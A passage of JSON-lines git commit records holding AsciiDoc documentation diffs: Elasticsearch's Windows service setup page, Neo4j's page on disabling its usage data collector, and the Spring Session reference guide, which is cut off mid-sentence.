ticsearch,mute\/elasticsearch,tsohil\/elasticsearch,kevinkluge\/elasticsearch,myelin\/elasticsearch,jimczi\/elasticsearch,IanvsPoplicola\/elasticsearch,rmuir\/elasticsearch,HarishAtGitHub\/elasticsearch,mbrukman\/elasticsearch,gfyoung\/elasticsearch,iacdingping\/elasticsearch,luiseduardohdbackup\/elasticsearch,fforbeck\/elasticsearch,JackyMai\/elasticsearch,uschindler\/elasticsearch,fekaputra\/elasticsearch","old_file":"docs\/reference\/setup\/as-a-service-win.asciidoc","new_file":"docs\/reference\/setup\/as-a-service-win.asciidoc","new_contents":"[[setup-service-win]]\n== Running as a Service on Windows\n\nWindows users can configure Elasticsearch to run as a service to run in the background or start automatically\nat startup without any user interaction.\nThis can be achieved through `service.bat` script under `bin\/` folder which allows one to install,\nremove, manage or configure the service and potentially start and stop the service, all from the command-line.\n\n[source,sh]\n--------------------------------------------------\nc:\\elasticsearch-0.90.5\\bin>service\n\nUsage: service.bat install|remove|start|stop|manager [SERVICE_ID]\n--------------------------------------------------\n\nThe script requires one parameter (the command to execute) followed by an optional one indicating the service\nid (useful when installing multiple Elasticsearch services).\n\nThe commands available are:\n\n[horizontal]\n`install`:: Install Elasticsearch as a service\n\n`remove`:: Remove the installed Elasticsearch service (and stop the service if started)\n\n`start`:: Start the Elasticsearch service (if installed)\n\n`stop`:: Stop the Elasticsearch service (if started)\n\n`manager`:: Start a GUI for managing the installed service\n\nNote that the environment configuration options available during the installation are copied and will be used during\nthe service lifecycle. This means any changes made to them after the installation will not be picked up unless\nthe service is reinstalled.\n\nBased on the architecture of the available JDK\/JRE (set through `JAVA_HOME`), the appropriate 64-bit(x64) or 32-bit(x86)\nservice will be installed. This information is made available during install:\n\n[source,sh]\n--------------------------------------------------\nc:\\elasticsearch-0.90.5\\bin>service install\nInstalling service : \"elasticsearch-service-x64\"\nUsing JAVA_HOME (64-bit): \"c:\\jvm\\jdk1.7\"\nThe service 'elasticsearch-service-x64' has been installed.\n--------------------------------------------------\n\nNOTE: While a JRE can be used for the Elasticsearch service, due to its use of a client VM (as oppose to a server JVM which\noffers better performance for long-running applications) its usage is discouraged and a warning will be issued.\n\n[float]\n=== Customizing service settings\n\nThere are two ways to customize the service settings:\n\nManager GUI:: accessible through `manager` command, the GUI offers insight into the installed service including its status, startup type,\nJVM, start and stop settings among other things. Simply invoking `service.bat` from the command-line with the aforementioned option\nwill open up the manager window:\n\nimage::images\/service-manager-win.png[\"Windows Service Manager GUI\",align=\"center\"]\n\nCustomizing `service.bat`:: at its core, `service.bat` relies on http:\/\/commons.apache.org\/proper\/commons-daemon\/[Apache Commons Daemon] project\nto install the services. For full flexibility such as customizing the user under which the service runs, one can modify the installation\nparameters to tweak all the parameters accordingly. Do note that this requires reinstalling the service for the new settings to be applied.\n\nNOTE: There is also a community supported customizable MSI installer available: https:\/\/github.com\/salyh\/elasticsearch-msi-installer (by Hendrik Saly).\n","old_contents":"[[setup-service-win]]\n== Running as a Service on Windows\n\nWindows users can configure Elasticsearch to run as a service to run in the background or start automatically\nat startup without any user interaction.\nThis can be achieved through `service.bat` script under `bin\/` folder which allows one to install,\nremove, manage or configure the service and potentially start and stop the service, all from the command-line.\n\n[source,sh]\n--------------------------------------------------\nc:\\elasticsearch-0.90.5\\bin>service\n\nUsage: service.bat install|remove|start|stop|manager [SERVICE_ID]\n--------------------------------------------------\n\nThe script requires one parameter (the command to execute) followed by an optional one indicating the service\nid (useful when installing multiple Elasticsearch services).\n\nThe commands available are:\n\n[horizontal]\n`install`:: Install Elasticsearch as a service\n\n`remove`:: Remove the installed Elasticsearch service (and stop the service if started)\n\n`start`:: Start the Elasticsearch service (if installed)\n\n`stop`:: Stop the Elasticsearch service (if started)\n\n`manager`:: Start a GUI for managing the installed service\n\nNote that the environment configuration options available during the installation are copied and will be used during\nthe service lifecycle. This means any changes made to them after the installation will not be picked up unless\nthe service is reinstalled.\n\nBased on the architecture of the available JDK\/JRE (set through `JAVA_HOME`), the appropriate 64-bit(x64) or 32-bit(x86)\nservice will be installed. This information is made available during install:\n\n[source,sh]\n--------------------------------------------------\nc:\\elasticsearch-0.90.5\\bin>service install\nInstalling service : \"elasticsearch-service-x64\"\nUsing JAVA_HOME (64-bit): \"c:\\jvm\\jdk1.7\"\nThe service 'elasticsearch-service-x64' has been installed.\n--------------------------------------------------\n\nNOTE: While a JRE can be used for the Elasticsearch service, due to its use of a client VM (as oppose to a server JVM which\noffers better performance for long-running applications) its usage is discouraged and a warning will be issued.\n\n[float]\n=== Customizing service settings\n\nThere are two ways to customize the service settings:\n\nManager GUI:: accessible through `manager` command, the GUI offers insight into the installed service including its status, startup type,\nJVM, start and stop settings among other things. Simply invoking `service.bat` from the command-line with the aforementioned option\nwill open up the manager window:\n\nimage::images\/service-manager-win.png[\"Windows Service Manager GUI\",align=\"center\"]\n\nCustomizing `service.bat`:: at its core, `service.bat` relies on http:\/\/commons.apache.org\/proper\/commons-daemon\/[Apache Commons Daemon] project\nto install the services. For full flexibility such as customizing the user under which the service runs, one can modify the installation\nparameters to tweak all the parameters accordingly. Do note that this requires reinstalling the service for the new settings to be applied.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ea8e3284754eb5eb49a2b6d0e2480acd9898618a","subject":"Update 2015-03-22-Hallo-Welt.adoc","message":"Update 2015-03-22-Hallo-Welt.adoc","repos":"woehrl01\/woehrl01.hubpress.io,woehrl01\/woehrl01.hubpress.io,woehrl01\/woehrl01.hubpress.io","old_file":"_posts\/2015-03-22-Hallo-Welt.adoc","new_file":"_posts\/2015-03-22-Hallo-Welt.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"715747b5c886551ae339a8dc2bcd3fb49f09313f","subject":"Updated UDC disable docs","message":"Updated UDC disable docs\n","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"community\/udc\/src\/docs\/ops\/index.asciidoc","new_file":"community\/udc\/src\/docs\/ops\/index.asciidoc","new_contents":"[[usage-data-collector]]\nUsage Data Collector\n====================\n\nThe Neo4j Usage Data Collector is a sub-system that gathers usage data, reporting it to the UDC-server at udc.neo4j.org.\nIt is easy to disable, and does not collect any data that is confidential. For more information about what is being sent, see below.\n\nThe Neo4j team uses this information as a form of automatic, effortless feedback from the Neo4j community.\nWe want to verify that we are doing the right thing by matching download statistics with usage statistics.\nAfter each release, we can see if there is a larger retention span of the server software.\n\nThe data collected is clearly stated here.\nIf any future versions of this system collect additional data, we will clearly announce those changes.\n\nThe Neo4j team is very concerned about your privacy. We do not disclose any personally identifiable information.\n\n\n== Technical Information ==\n\nTo gather good statistics about Neo4j usage, UDC collects this information:\n\n* Kernel version: The build number, and if there are any modifications to the kernel.\n* Store id: A randomized globally unique id created at the same time a database is created.\n* Ping count: UDC holds an internal counter which is incremented for every ping, and reset for every restart of the kernel.\n* Source: This is either \"neo4j\" or \"maven\". If you downloaded Neo4j from the Neo4j website, it's \"neo4j\", if you are using Maven to get Neo4j, it will be \"maven\".\n* Java version: The referrer string shows which version of Java is being used.\n* MAC address to uniquely identify instances behind firewalls.\n* Registration id: For registered server instances.\n* Tags about the execution context (e.g. test, language, web-container, app-container, spring, ejb).\n* Neo4j Edition (community, enterprise).\n* A hash of the current cluster name (if any).\n* Distribution information for Linux (rpm, dpkg, unknown).\n* User-Agent header for tracking usage of REST client drivers\n\nAfter startup, UDC waits for ten minutes before sending the first ping. It does this for two reasons; first, we don't want the startup to be slower because of UDC, and secondly, we want to keep pings from automatic tests to a minimum. The ping to the UDC servers is done with a HTTP GET.\n\n\n== How to disable UDC ==\n\nWe've tried to make it extremely easy to disable UDC. In fact, the code for UDC is not even included in the kernel jar but as a completely separate component.\n\nThere are three ways you can disable UDC:\n\n. The easiest way is to just remove the neo4j-udc-*.jar file. By doing this, the kernel will not load UDC, and no pings will be sent.\n\n. If you are using Maven, and want to make sure that UDC is never installed in your system, a dependency element like this will do that:\n+\n[source,xml]\n--------------------\n <dependency>\n <groupId>org.neo4j<\/groupId>\n <artifactId>neo4j<\/artifactId>\n <version>${neo4j-version}<\/version>\n <exclusions>\n <exclusion>\n <groupId>org.neo4j<\/groupId>\n <artifactId>neo4j-udc<\/artifactId>\n <\/exclusion>\n <\/exclusions>\n <\/dependency>\n--------------------\n+\n_Where $\\{neo4j-version} is the Neo4j version in use._\n\n. Lastly, if you are using a packaged version of Neo4j, and do not want to make any change to the jars, a system property setting like this will also make sure that UDC is never activated: +-Dneo4j.ext.udc.enabled=false+.\n\n","old_contents":"[[usage-data-collector]]\nUsage Data Collector\n====================\n\nThe Neo4j Usage Data Collector is a sub-system that gathers usage data, reporting it to the UDC-server at udc.neo4j.org.\nIt is easy to disable, and does not collect any data that is confidential. For more information about what is being sent, see below.\n\nThe Neo4j team uses this information as a form of automatic, effortless feedback from the Neo4j community.\nWe want to verify that we are doing the right thing by matching download statistics with usage statistics.\nAfter each release, we can see if there is a larger retention span of the server software.\n\nThe data collected is clearly stated here.\nIf any future versions of this system collect additional data, we will clearly announce those changes.\n\nThe Neo4j team is very concerned about your privacy. We do not disclose any personally identifiable information.\n\n\n== Technical Information ==\n\nTo gather good statistics about Neo4j usage, UDC collects this information:\n\n* Kernel version: The build number, and if there are any modifications to the kernel.\n* Store id: A randomized globally unique id created at the same time a database is created.\n* Ping count: UDC holds an internal counter which is incremented for every ping, and reset for every restart of the kernel.\n* Source: This is either \"neo4j\" or \"maven\". If you downloaded Neo4j from the Neo4j website, it's \"neo4j\", if you are using Maven to get Neo4j, it will be \"maven\".\n* Java version: The referrer string shows which version of Java is being used.\n* MAC address to uniquely identify instances behind firewalls.\n* Registration id: For registered server instances.\n* Tags about the execution context (e.g. test, language, web-container, app-container, spring, ejb).\n* Neo4j Edition (community, enterprise).\n* A hash of the current cluster name (if any).\n* Distribution information for Linux (rpm, dpkg, unknown).\n* User-Agent header for tracking usage of REST client drivers\n\nAfter startup, UDC waits for ten minutes before sending the first ping. It does this for two reasons; first, we don't want the startup to be slower because of UDC, and secondly, we want to keep pings from automatic tests to a minimum. The ping to the UDC servers is done with a HTTP GET.\n\n\n== How to disable UDC ==\n\nWe've tried to make it extremely easy to disable UDC. In fact, the code for UDC is not even included in the kernel jar but as a completely separate component.\n\nThere are three ways you can disable UDC:\n\n. The easiest way is to just remove the neo4j-udc-*.jar file. By doing this, the kernel will not load UDC, and no pings will be sent.\n\n. If you are using Maven, and want to make sure that UDC is never installed in your system, a dependency element like this will do that:\n+\n[source,xml]\n--------------------\n <dependency>\n <groupId>org.neo4j<\/groupId>\n <artifactId>neo4j<\/artifactId>\n <version>${neo4j-version}<\/version>\n <exclusions>\n <exclusion>\n <groupId>org.neo4j<\/groupId>\n <artifactId>neo4j-udc<\/artifactId>\n <\/exclusion>\n <\/exclusions>\n <\/dependency>\n--------------------\n+\n_Where $\\{neo4j-version} is the Neo4j version in use._\n\n. Lastly, if you are using a packaged version of Neo4j, and do not want to make any change to the jars, a system property setting like this will also make sure that UDC is never activated: +-Dneo4j.ext.udc.disable=true+. \n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"32cf8ad7adad1b9698bf93f5a036403e9c511586","subject":"Fix minor documentation errors","message":"Fix minor documentation errors\n","repos":"vpavic\/spring-session,vpavic\/spring-session,vpavic\/spring-session","old_file":"docs\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/src\/docs\/asciidoc\/index.adoc","new_contents":"= Spring Session\nRob Winch\n:doctype: book\n:indexdoc-tests: {docs-test-dir}docs\/IndexDocTests.java\n:websocketdoc-test-dir: {docs-test-dir}docs\/websocket\/\n:toc: left\n\n[[abstract]]\n\nSpring Session provides an API and implementations for managing a user's session information.\n\n[[introduction]]\n== Introduction\n\nSpring Session provides an API and implementations for managing a user's session information. It also provides transparent integration with:\n\n* <<httpsession,HttpSession>> - allows replacing the HttpSession in an application container (i.e. Tomcat) neutral way.\nAdditional features include:\n** **Clustered Sessions** - Spring Session makes it trivial to support <<httpsession-redis,clustered sessions>> without being tied to an application container specific solution.\n** **Multiple Browser Sessions** - Spring Session supports <<httpsession-multi,managing multiple users' sessions>> in a single browser instance (i.e. multiple authenticated accounts similar to Google).\n** **RESTful APIs** - Spring Session allows providing session ids in headers to work with <<httpsession-rest,RESTful APIs>>\n\n* <<websocket,WebSocket>> - provides the ability to keep the `HttpSession` alive when receiving WebSocket messages\n\n== What's New in 1.1\n\nBelow are the highlights of what is new in Spring Session 1.1. You can find a complete list of what's new in https:\/\/github.com\/spring-projects\/spring-session\/issues?utf8=%E2%9C%93&q=milestone%3A%221.1.0+M1%22[1.1.0 M1] and https:\/\/github.com\/spring-projects\/spring-session\/issues?utf8=%E2%9C%93&q=milestone%3A%221.1.0+RC1%22[1.1.0 RC1] by referring to the changelog.\n\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/148[#148] - Added <<httpsession-gemfire,GemFire Support>>\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/7[#7] - link:guides\/findbyusername.html[Query by Username]\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/299[#299] - link:guides\/custom-cookie.html[Customize Cookie Creation]\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/4[#4] - Add <<httpsession-httpsessionlistener,HttpSessionListener>> support\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/283[#283] - Allow override default `RedisSerializer`\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/277[#277] - Added link:guides\/hazelcast-spring.html[@EnableHazelcastHttpSession]\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/271[#271] - Performance improvements\n* https:\/\/github.com\/spring-projects\/spring-session\/pull\/218[#218] - Allow scoping the session in Redis using <<api-redisoperationssessionrepository-config,redisNamespace>>\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/273[#273] - Allow writing to Redis immediately (instead of lazily) using <<api-redisoperationssessionrepository-config,redisFlushMode>>\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/272[#272] - Add `ExpiringSession.setLastAccessedTime(long)`\n* https:\/\/github.com\/spring-projects\/spring-session\/pull\/349[#349] - Added https:\/\/gitter.im\/spring-projects\/spring-session[Gitter Room] for discussing Spring Session\n\n[[samples]]\n== Samples and Guides (Start Here)\n\nIf you are looking to get started with Spring Session, the best place to start is our Sample Applications.\n\n.Sample Applications\n|===\n| Source | Description | Guide\n\n| {gh-samples-url}httpsession[HttpSession]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with a Redis store.\n| link:guides\/httpsession.html[HttpSession Guide]\n\n| {gh-samples-url}httpsession-xml[HttpSession XML]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with a Redis store using XML based configuration.\n| link:guides\/httpsession-xml.html[HttpSession XML Guide]\n\n| {gh-samples-url}httpsession-gemfire-clientserver[HttpSession with GemFire (Client\/Server)]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with GemFire using a Client\/Server topology.\n| link:guides\/httpsession-gemfire-clientserver.html[HttpSession GemFire Client\/Server Guide]\n\n| {gh-samples-url}httpsession-gemfire-clientserver-xml[HttpSession with GemFire (Client\/Server) using XML]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with GemFire using a Client\/Server topology configured with XML.\n| link:guides\/httpsession-gemfire-clientserver-xml.html[HttpSession GemFire Client\/Server XML Guide]\n\n| {gh-samples-url}httpsession-gemfire-p2p[HttpSession with GemFire (P2P)]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with GemFire using a P2P topology.\n| link:guides\/httpsession-gemfire-p2p.html[HttpSession GemFire P2P Guide]\n\n| {gh-samples-url}httpsession-gemfire-p2p-xml[HttpSession with GemFire (P2P) using XML]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with GemFire using a P2P topology configured with XML.\n| link:guides\/httpsession-gemfire-p2p-xml.html[HttpSession GemFire P2P XML Guide]\n\n| {gh-samples-url}custom-cookie[Custom Cookie]\n| Demonstrates how to use Spring Session and customize the cookie.\n| link:guides\/custom-cookie.html[Custom Cookie Guide]\n\n| {gh-samples-url}boot[Spring Boot]\n| Demonstrates how to use Spring Session with Spring Boot.\n| link:guides\/boot.html[Spring Boot Guide]\n\n| {gh-samples-url}security[Spring Security]\n| Demonstrates how to use Spring Session with an existing Spring Security application.\n| link:guides\/security.html[Spring Security Guide]\n\n| {gh-samples-url}rest[REST]\n| Demonstrates how to use Spring Session in a REST application to support authenticating with a header.\n| link:guides\/rest.html[REST Guide]\n\n| {gh-samples-url}findbyusername[Find by Username]\n| Demonstrates how to use Spring Session to find sessions by username.\n| link:guides\/findbyusername.html[Find by Username]\n\n| {gh-samples-url}users[Multiple Users]\n| Demonstrates how to use Spring Session to manage multiple simultaneous browser sessions (i.e Google Accounts).\n| link:guides\/users.html[Manage Multiple Users Guide]\n\n| {gh-samples-url}websocket[WebSocket]\n| Demonstrates how to use Spring Session with WebSockets.\n| link:guides\/websocket.html[WebSocket Guide]\n\n[[samples-hazelcast]]\n| {gh-samples-url}hazelcast[Hazelcast]\n| Demonstrates how to use Spring Session with Hazelcast.\n| TBD\n\n[[samples-hazelcast-spring]]\n| {gh-samples-url}hazelcast-spring[Hazelcast Spring]\n| Demonstrates how to use Spring Session and Hazelcast with an existing Spring Security application.\n| link:guides\/hazelcast-spring.html[Hazelcast Spring Guide]\n\n|===\n\n[[httpsession]]\n== HttpSession Integration\n\nSpring Session provides transparent integration with `HttpSession`.\nThis means that developers can switch the `HttpSession` implementation out with an implementation that is backed by Spring Session.\n\n[[httpsession-why]]\n=== Why Spring Session & HttpSession?\n\nWe have already mentioned that Spring Session provides transparent integration with `HttpSession`, but what benefits do we get out of this?\n\n* **Clustered Sessions** - Spring Session makes it trivial to support <<httpsession-redis,clustered sessions>> without being tied to an application container specific solution.\n* **Multiple Browser Sessions** - Spring Session supports <<httpsession-multi,managing multiple users' sessions>> in a single browser instance (i.e. multiple authenticated accounts similar to Google).\n* **RESTful APIs** - Spring Session allows providing session ids in headers to work with <<httpsession-rest,RESTful APIs>>\n\n[[httpsession-redis]]\n=== HttpSession with Redis\n\nUsing Spring Session with `HttpSession` is enabled by adding a Servlet Filter before anything that uses the `HttpSession`.\nYou can choose from enabling this using either:\n\n* <<httpsession-redis-jc,Java Based Configuration>>\n* <<httpsession-redis-xml,XML Based Configuration>>\n\n[[httpsession-redis-jc]]\n==== Redis Java Based Configuration\n\nThis section describes how to use Redis to back `HttpSession` using Java based configuration.\n\nNOTE: The <<samples, HttpSession Sample>> provides a working sample on how to integrate Spring Session and `HttpSession` using Java configuration.\nYou can read the basic steps for integration below, but you are encouraged to follow along with the detailed HttpSession Guide when integrating with your own application.\n\ninclude::guides\/httpsession.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-redis-xml]]\n==== Redis XML Based Configuration\n\nThis section describes how to use Redis to back `HttpSession` using XML based configuration.\n\nNOTE: The <<samples, HttpSession XML Sample>> provides a working sample on how to integrate Spring Session and `HttpSession` using XML configuration.\nYou can read the basic steps for integration below, but you are encouraged to follow along with the detailed HttpSession XML Guide when integrating with your own application.\n\ninclude::guides\/httpsession-xml.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-gemfire]]\n=== HttpSession with Pivotal GemFire\n\nWhen https:\/\/pivotal.io\/big-data\/pivotal-gemfire[Pivotal GemFire] is used with Spring Session, a web application's\n`HttpSession` can be replaced with a **clustered** implementation managed by GemFire and conveniently accessed\nwith Spring Session's API.\n\nThe two most common topologies to manage Spring Sessions using GemFire include:\n\n* <<httpsession-gemfire-clientserver,Client-Server>>\n* <<httpsession-gemfire-p2p,Peer-To-Peer (P2P)>>\n\nAdditionally, GemFire supports site-to-site replication using http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/topologies_and_comm\/multi_site_configuration\/chapter_overview.html[WAN functionality].\nThe ability to configure and use GemFire's WAN support is independent of Spring Session, and is beyond the scope\nof this document. More details on GemFire WAN functionality can be found http:\/\/docs.spring.io\/spring-data-gemfire\/docs\/current\/reference\/html\/#bootstrap:gateway[here].\n\n[[httpsession-gemfire-clientserver]]\n==== GemFire Client-Server\n\nThe http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/topologies_and_comm\/cs_configuration\/chapter_overview.html[Client-Server]\ntopology will probably be the more common configuration preference for users when using GemFire as a provider in\nSpring Session since a GemFire server will have significantly different and unique JVM heap requirements when compared\nto the application. Using a client-server topology enables an application to manage (e.g. replicate) application state\nindependently from other application processes.\n\nIn a client-server topology, an application using Spring Session will open a client cache connection to a (remote)\nGemFire server cluster to manage and provide consistent access to all `HttpSession` state.\n\nYou can configure a Client-Server topology with either:\n\n* <<httpsession-gemfire-clientserver-java,Java-based Configuration>>\n* <<httpsession-gemfire-clientserver-xml,XML-based Configuration>>\n\n[[httpsession-gemfire-clientserver-java]]\n===== GemFire Client-Server Java-based Configuration\n\nThis section describes how to use GemFire's Client-Server topology to back an `HttpSession` with Java-based configuration.\n\nNOTE: The <<samples,HttpSession with GemFire (Client-Server) Sample>> provides a working sample on how to integrate\nSpring Session and GemFire to replace the HttpSession using Java configuration. You can read the basic steps for\nintegration below, but you are encouraged to follow along with the detailed HttpSession with GemFire (Client-Server)\nGuide when integrating with your own application.\n\ninclude::guides\/httpsession-gemfire-clientserver.adoc[tags=config,leveloffset=+3]\n\n[[http-session-gemfire-clientserver-xml]]\n===== GemFire Client-Server XML-based Configuration\n\nThis section describes how to use GemFire's Client-Server topology to back an `HttpSession` with XML-based configuration.\n\nNOTE: The <<samples,HttpSession with GemFire (Client-Server) using XML Sample>> provides a working sample on how to\nintegrate Spring Session and GemFire to replace the `HttpSession` using XML configuration. You can read the basic steps\nfor integration below, but you are encouraged to follow along with the detailed HttpSession with GemFire (Client-Server)\nusing XML Guide when integrating with your own application.\n\ninclude::guides\/httpsession-gemfire-clientserver-xml.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-gemfire-p2p]]\n==== GemFire Peer-To-Peer (P2P)\n\nPerhaps less common would be to configure the Spring Session application as a peer member in the GemFire cluster using\nthe http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/topologies_and_comm\/p2p_configuration\/chapter_overview.html[Peer-To-Peer (P2P)] topology.\nIn this configuration, a Spring Session application would be an actual data node (server) in the GemFire cluster,\nand **not** a cache client as before.\n\nOne advantage to this approach is the proximity of the application to the application's state (i.e. it's data). However,\nthere are other effective means of accomplishing similar data dependent computations, such as using GemFire's\nhttp:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/developing\/function_exec\/chapter_overview.html[Function Execution].\nAny of GemFire's other http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/getting_started\/product_intro.html[features]\ncan be used when GemFire is serving as a provider in Spring Session.\n\nP2P is very useful for both testing purposes as well as smaller, more focused and self-contained applications,\nsuch as those found in a microservices architecture, and will most certainly improve on your application's latency,\nthroughput and consistency needs.\n\nYou can configure a Peer-To-Peer (P2P) topology with either:\n\n* <<httpsession-gemfire-p2p-java,Java-based Configuration>>\n* <<httpsession-gemfire-p2p-xml,XML-based Configuration>>\n\n[[httpsession-gemfire-p2p-java]]\n===== GemFire Peer-To-Peer (P2P) Java-based Configuration\n\nThis section describes how to use GemFire's Peer-To-Peer (P2P) topology to back an `HttpSession` using Java-based configuration.\n\nNOTE: The <<samples, HttpSession with GemFire (P2P) Sample>> provides a working sample on how to integrate\nSpring Session and GemFire to replace the `HttpSession` using Java configuration. You can read the basic steps\nfor integration below, but you are encouraged to follow along with the detailed HttpSession with GemFire (P2P) Guide\nwhen integrating with your own application.\n\ninclude::guides\/httpsession-gemfire-p2p.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-gemfire-p2p-xml]]\n===== GemFire Peer-To-Peer (P2P) XML-based Configuration\n\nThis section describes how to use GemFire's Peer-To-Peer (P2P) topology to back an `HttpSession` using XML-based configuration.\n\nNOTE: The <<samples, HttpSession with GemFire (P2P) using XML Sample>> provides a working sample on how to integrate\nSpring Session and GemFire to replace the `HttpSession` using XML configuration. You can read the basic steps for\nintegration below, but you are encouraged to follow along with the detailed HttpSession with GemFire (P2P) using XML\nGuide when integrating with your own application.\n\ninclude::guides\/httpsession-gemfire-p2p-xml.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-how]]\n=== How HttpSession Integration Works\n\nFortunately both `HttpSession` and `HttpServletRequest` (the API for obtaining an `HttpSession`) are both interfaces.\nThis means that we can provide our own implementations for each of these APIs.\n\nNOTE: This section describes how Spring Session provides transparent integration with `HttpSession`. The intent is so that user's can understand what is happening under the covers. This functionality is already integrated and you do NOT need to implement this logic yourself.\n\nFirst we create a custom `HttpServletRequest` that returns a custom implementation of `HttpSession`.\nIt looks something like the following:\n\n[source, java]\n----\npublic class SessionRepositoryRequestWrapper extends HttpServletRequestWrapper {\n\n\tpublic SessionRepositoryRequestWrapper(HttpServletRequest original) {\n\t\tsuper(original);\n\t}\n\n\tpublic HttpSession getSession() {\n\t\treturn getSession(true);\n\t}\n\n\tpublic HttpSession getSession(boolean createNew) {\n\t\t\/\/ create an HttpSession implementation from Spring Session\n\t}\n\n\t\/\/ ... other methods delegate to the original HttpServletRequest ...\n}\n----\n\nAny method that returns an `HttpSession` is overridden.\nAll other methods are implemented by `HttpServletRequestWrapper` and simply delegate to the original `HttpServletRequest` implementation.\n\nWe replace the `HttpServletRequest` implementation using a servlet `Filter` called `SessionRepositoryFilter`.\nThe pseudocode can be found below:\n\n[source, java]\n----\npublic class SessionRepositoryFilter implements Filter {\n\n\tpublic doFilter(ServletRequest request, ServletResponse response, FilterChain chain) {\n\t\tHttpServletRequest httpRequest = (HttpServletRequest) request;\n\t\tSessionRepositoryRequestWrapper customRequest =\n\t\t\tnew SessionRepositoryRequestWrapper(httpRequest);\n\n\t\tchain.doFilter(customRequest, response, chain);\n\t}\n\n\t\/\/ ...\n}\n----\n\nBy passing in a custom `HttpServletRequest` implementation into the `FilterChain` we ensure that anything invoked after our `Filter` uses the custom `HttpSession` implementation.\nThis highlights why it is important that Spring Session's `SessionRepositoryFilter` must be placed before anything that interacts with the `HttpSession`.\n\n[[httpsession-multi]]\n=== Multiple HttpSessions in Single Browser\n\nSpring Session has the ability to support multiple sessions in a single browser instance.\nThis provides the ability to support authenticating with multiple users in the same browser instance (i.e. Google Accounts).\n\nNOTE: The <<samples,Manage Multiple Users Guide>> provides a complete working example of managing multiple users in the same browser instance.\nYou can follow the basic steps for integration below, but you are encouraged to follow along with the detailed Manage Multiple Users Guide when integrating with your own application.\n\ninclude::guides\/users.adoc[tags=how-does-it-work,leveloffset=+1]\n\n[[httpsession-rest]]\n=== HttpSession & RESTful APIs\n\nSpring Session can work with RESTful APIs by allowing the session to be provided in a header.\n\n\nNOTE: The <<samples, REST Sample>> provides a working sample on how to use Spring Session in a REST application to support authenticating with a header.\nYou can follow the basic steps for integration below, but you are encouraged to follow along with the detailed REST Guide when integrating with your own application.\n\ninclude::guides\/rest.adoc[tags=config,leveloffset=+2]\n\n[[httpsession-httpsessionlistener]]\n=== HttpSessionListener\n\nSpring Session supports `HttpSessionListener` by translating `SessionDestroyedEvent` and `SessionCreatedEvent` into `HttpSessionEvent` by declaring `SessionEventHttpSessionListenerAdapter`.\nTo use this support, you need to:\n\n* Ensure your `SessionRepository` implementation supports and is configured to fire `SessionDestroyedEvent` and `SessionCreatedEvent`.\n* Configure `SessionEventHttpSessionListenerAdapter` as a Spring bean.\n* Inject every `HttpSessionListener` into the `SessionEventHttpSessionListenerAdapter`\n\nIf you are using the configuration support documented in <<httpsession-redis,HttpSession with Redis>>, then all you need to do is register every `HttpSessionListener` as a bean.\nFor example, assume you want to support Spring Security's concurrency control and need to use `HttpSessionEventPublisher` you can simply add `HttpSessionEventPublisher` as a bean.\nIn Java configuration, this might look like:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/http\/RedisHttpSessionConfig.java[tags=config]\n----\n\nIn XML configuration, this might look like:\n\n[source,xml,indent=0]\n----\ninclude::{docs-test-resources-dir}docs\/http\/HttpSessionListenerXmlTests-context.xml[tags=config]\n----\n\n[[websocket]]\n== WebSocket Integration\n\nSpring Session provides transparent integration with Spring's WebSocket support.\n\ninclude::guides\/websocket.adoc[tags=disclaimer,leveloffset=+1]\n\n[[websocket-why]]\n=== Why Spring Session & WebSockets?\n\nSo why do we need Spring Session when using WebSockets?\n\nConsider an email application that does much of its work through HTTP requests.\nHowever, there is also a chat application embedded within it that works over WebSocket APIs.\nIf a user is actively chatting with someone, we should not timeout the `HttpSession` since this would be pretty poor user experience.\nHowever, this is exactly what https:\/\/java.net\/jira\/browse\/WEBSOCKET_SPEC-175[JSR-356] does.\n\nAnother issue is that according to JSR-356 if the `HttpSession` times out any WebSocket that was created with that HttpSession and an authenticated user should be forcibly closed.\nThis means that if we are actively chatting in our application and are not using the HttpSession, then we will also disconnect from our conversation!\n\n[[websocket-usage]]\n=== WebSocket Usage\n\nThe <<samples, WebSocket Sample>> provides a working sample on how to integrate Spring Session with WebSockets.\nYou can follow the basic steps for integration below, but you are encouraged to follow along with the detailed WebSocket Guide when integrating with your own application:\n\n[[websocket-httpsession]]\n==== HttpSession Integration\n\nBefore using WebSocket integration, you should be sure that you have <<httpsession>> working first.\n\ninclude::guides\/websocket.adoc[tags=config,leveloffset=+2]\n\n[[api]]\n== API Documentation\n\nYou can browse the complete link:..\/..\/api\/[Javadoc] online. The key APIs are described below:\n\n[[api-session]]\n=== Session\n\nA `Session` is a simplified `Map` of name value pairs.\n\nTypical usage might look like the 